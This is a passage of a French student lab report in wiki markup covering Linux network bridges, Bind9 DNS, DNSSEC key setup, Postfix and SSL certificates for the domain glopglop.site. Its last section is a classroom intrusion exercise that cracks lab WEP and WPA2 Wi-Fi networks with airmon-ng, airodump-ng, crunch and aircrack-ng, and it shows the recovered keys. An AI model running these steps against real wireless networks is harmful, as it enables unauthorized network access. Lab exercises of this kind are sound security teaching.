 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
